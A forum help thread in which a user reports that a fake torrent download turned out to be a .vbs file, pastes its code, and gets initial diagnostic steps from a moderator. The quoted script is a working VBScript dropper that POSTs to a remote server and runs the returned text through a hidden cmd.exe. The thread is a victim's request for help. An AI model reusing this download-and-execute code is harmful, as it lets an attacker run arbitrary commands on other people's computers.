Status
Not open for further replies.

rugymon

New Member
Hello,

Today my father was trying to download a torrent file for a movie (he doesn't understand much about computers, but I showed him a website where I had always downloaded my movies without problems and I taught him how to use it), but instead of a torrent file it was a .vbs file. He tried to open thinking it was the torrent, and immediately an avast notification showed up, Now every few minutes (maybe 10) I get an avast pop-up notifying me about a connection blocked (screenshot attached).

The .vbs file looks like this:
Code:
dim Winhttps
Set Winhttps = CreateObject("Winhttp.WinhttpRequest.5.1")
ntlydv1 = "[removed]"
Winhttps.Open "POST", ntlydv1, False
Winhttps.Send
dim Application
Application =  Wscript.ScriptName
CreateObject("Shell.Application").Application.ShellExecute "c:\windows\system32\cmd",Winhttps.responseText & Application,ntlydv,"",0

I runned MalwareBytes Anti-Malware but avast is still blocking the connection every few minutes. Then I runned Farbar Recovery Scan Tool and attached the reports.
*Screenshot and files from Farbar are in spanish, if this is an inconvenient tell me.

Thanks in advance for every kind of help provided.
 

Attachments

  • Addition.txt
    94.2 KB · Views: 2
  • FRST.txt
    70 KB · Views: 2
  • Screenshot_1.png
    Screenshot_1.png
    32.1 KB · Views: 7
Last edited by a moderator:

icotonev

Moderator
Verified
Staff member
Hi , rugymon...! Welcome to MALWARETIPS ..! :) I am icotonev and will be helping you with your computer problems..! Please give me some time to go over your logs and I will get back to you as soon as possible... !!! :)

+

Scanning with SecurityCheck by glax24

  • Download SecurityCheck by glax24 from here and remember the tool on the desktop.
  • Run the program right-click the administrator name
  • Wait for the scan to finish. It will open in a text file named SecurityType.txt. Copy the contents of this file to your next post
  • You can find this file in the root of the system disk in a folder called SecurityCheck, C: \\ SecurityCheck \\ SecurityCheck.txt
----------------------------------------------------------------------------------------



In your next reply, please include:


  • SecurityCheck.txt
 
Last edited:

rugymon

New Member
Sorry I didn't reply earlier. I've finally decided to reset my windows 10 since it's been a long time since the last reset and it was full of crap, and I've taken the opportunity.

Please consider the problem solved and close the thread.

Sorry for the inconvenient.
 
Status
Not open for further replies.
Top